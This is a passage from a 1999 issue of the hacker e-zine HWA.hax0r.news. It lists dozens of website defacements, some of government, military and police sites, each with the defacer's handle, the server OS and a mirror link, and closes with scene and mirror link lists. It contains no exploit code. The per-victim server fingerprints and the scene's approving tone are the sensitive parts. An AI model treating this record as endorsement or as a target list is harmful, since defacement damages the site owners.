Operating System: Solaris
Date 11/5/99

Defaced domain: www.tax.state.ny.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.tax.state.ny.us
Defaced by: hV2k
Operating System: NT
Date 11/6/99

Defaced domain: janus.state.me.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/janus.state.me.us
Defaced by: hV2k
Operating System: NT
Date 11/6/99

Defaced domain: www.buddhakatrecords.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.buddhakatrecords.com
Defaced by: Pinky The Penguin
Operating System: NT
Date 11/6/99

Site: www.samhsa.gov
OS: NT/IIS4.0
Group: keebler elves (they're back)
Date 11/6/99

Defaced domain: www.parkscanada.pch.gc.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.parkscanada.pch.gc.ca
Defaced by: chem/Shark
Operating System: NT
Date 11/6/99

Defaced domain: www.keebler.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.keebler.com
Defaced by: keebler
Operating System: NT
Date 11/6/99

Defaced domain: www.gordongraydon.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.gordongraydon.com
Defaced by: pyrostorm
Operating System: Linux
Date 11/6/99

Defaced domain: www.cub-ed.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.cub-ed.com
Defaced by: p4riah
Operating System: NT
Date 11/6/99

Defaced domain: www.army.mod.uk
Mirror:
http://www.attrition.org/mirror/attrition/1999/11/06/www.army.mod.uk Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: www.eucom.mil Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.eucom.mil Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: www.keebler.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keebler.com Defaced by: unknown Operating System: NT Date 11/6/99 Defaced domain: www.cnv.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cnv.org Defaced by: keebler elves Operating System: NT Date 11/6/99 Defaced domain: lgenterprises.threadnet.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/lgenterprises.threadnet.com Defaced by: DHC Operating System: Linux Date 11/6/99 Defaced domain: www.hwa.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/05/www.hwa.net Defaced by: ch4x Operating System: NT Date 11/6/99 Defaced domain: www.click2u.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.click2u.com Defaced by: ytcracker Operating System: Windows NT (WebSitePro/2.4.5) Date 11/6/99 Defaced domain: www.fintrac.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.fintrac.com Defaced by: coderz Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: acc02.acc1.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/acc02.acc1.edu Defaced by: Verb0 Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.utaced.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.utaced.edu Defaced by: Verb0 Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.salton-maxim.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.salton-maxim.com Defaced by: ne0h Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: 209.247.153.200 Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/209.247.153.200 Defaced by: nawk 
Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.keimyung.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.keimyung.ac.kr Defaced by: project x Operating System: Solaris 2.x (Apache 1.3.3) Date 11/6/99 Defaced domain: www.peoplesupport.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.peoplesupport.com Defaced by: MetalTung Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: dmla.clan.lib.nv.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/dmla.clan.lib.nv.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.spa.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.spa.gov.my Defaced by: OySTr n KLaM Operating System: Solaris 2.5x (Apache 1.3.3) Date 11/6/99 Defaced domain: sex-offender.vsp.state.va.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/sex-offender.vsp.state.va.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.state.co.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.state.co.us Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: www.ci.arlington.tx.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.ci.arlington.tx.us Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: police.ci.berkeley.ca.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/police.ci.berkeley.ca.us Defaced by: hV2k Operating System: Windows NT (IIS/4.) 
Date 11/6/99 Defaced domain: www.brasemb.or.jp Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.brasemb.or.jp Defaced by: JLM Operating System: Windows NT (IIS/4.0) Date 11/6/99 Defaced domain: infobase.ic.gc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/infobase.ic.gc.ca Defaced by: ch4x Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.hoehne.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.hoehne.com Defaced by: xhostile Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.cegep-heritage.qc.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.cegep-heritage.qc.ca Defaced by: ch4x Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.t75warez.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/06/www.t75warez.com Defaced by: globher Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.3.6) Date 11/7/99 Defaced domain: ameribusiness.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ameribusiness.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: chilewebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chilewebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: atlaslink.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlaslink.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directorioantofagasta.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioantofagasta.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ajokeaday.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ajokeaday.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: appraise-now.com Mirror: 
http://www.attrition.org/mirror/attrition/1999/11/07/appraise-now.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: chistes.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chistes.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directorioconcepcion.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directorioconcepcion.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: arachnidbait.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/arachnidbait.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ayudante.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ayudante.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: earlywarningalarms.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/earlywarningalarms.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: filmmakersworldwide.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/filmmakersworldwide.com Defaced by: acid k|own Operating System: echo "internetsecurity.com" >> filmmakersworldwide.com Date 11/7/99 Defaced domain: chicago911.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/chicago911.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: crghrz.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/crghrz.com Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: herdaddy.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/herdaddy.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: directoriovalparaiso.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/directoriovalparaiso.com Defaced by: acid k|own Operating System: 
Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: ecuadorwebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/ecuadorwebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: icuss.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/icuss.net Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: laventaja.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/laventaja.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: justmfg.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/justmfg.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: noidos.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/noidos.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: mexicowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/mexicowebdirectory.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: atlantisinc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/atlantisinc.com Defaced by: Narcissus Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: pay-per-search.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/pay-per-search.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.tatincom.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: protectionelectronics.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/protectionelectronics.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: publicistasweb.com Mirror: 
http://www.attrition.org/mirror/attrition/1999/11/07/publicistasweb.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: robertward.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/robertward.com Defaced by: acid k|own Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: santiagowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/santiagowebdirectory.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: conto.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/conto.ru Defaced by: ytcracker Operating System: NMAP says FreeBSD, Server says IIS/4.0 Date 11/7/99 Defaced domain: webpeopleschoice.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/webpeopleschoice.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: textadvertising.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/textadvertising.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.ariel.muni.il Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ariel.muni.il Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: quitowebdirectory.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/quitowebdirectory.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: tecktron.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/tecktron.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: surplus2000.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/surplus2000.com Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Date 11/7/99 Defaced domain: www.tatincom.ru Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Date 
11/7/99 Defaced domain: www.mastic.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.mastic.gov.my Defaced by: JxLxMx Operating System: Windows NT Date 11/7/99 Defaced domain: www.tce.se.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tce.se.gov.br Defaced by: NFO Insecure Team Date 11/7/99 Defaced domain: www.sghms.ac.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.sghms.ac.uk Defaced by: tefx Operating System: Solaris Date 11/7/99 Defaced domain: www.ccsiinc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ccsiinc.com Defaced by: ph33r the b33r Operating System: Digital Unix Date 11/7/99 Defaced domain: www.lths.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.lths.org Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.reiseblitz.de Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.reiseblitz.de Defaced by: z0z Operating System: Solaris Date 11/7/99 Defaced domain: www.clubx.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.clubx.com Defaced by: twd Operating System: BSDI Date 11/7/99 Defaced domain: www.ak-prepared.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ak-prepared.com Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.opic.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.opic.gov Defaced by: hV2k Operating System: Windows NT Date 11/7/99 Defaced domain: www.stlib.state.nm.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.stlib.state.nm.us Defaced by: hV2k Operating System: Windows NT Date 11/7/99 Defaced domain: www.usis.com.ba Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.usis.com.ba Defaced by: Pakastan Hackerz Club Operating System: Windows 95 Date 11/7/99 Defaced domain: monitoring2.er.usgs.gov Mirror: 
http://www.attrition.org/mirror/attrition/1999/11/07/monitoring2.er.usgs.gov Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.dongac.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.dongac.ac.kr Defaced by: TREATY Operating System: Linux Date 11/7/99 Defaced domain: txdps.state.tx.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/txdps.state.tx.us Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 Defaced domain: www.trentonlibrary.state.nj.us Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.trentonlibrary.state.nj.us Defaced by: ytcracker Operating System: Windows NT Date 11/7/99 and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. 
** NEW **
http://www.alldas.de/hwaidx1.htm  ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa  *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links: (TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others, please send in news site links that
carry security news from foreign countries for inclusion in this list.
Thanks... - Ed

Belgium.......: http://securax.org/cum/  *New address*
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.

.za (South Africa) sites contributed by wyzwun, tnx guy...

Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.
@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]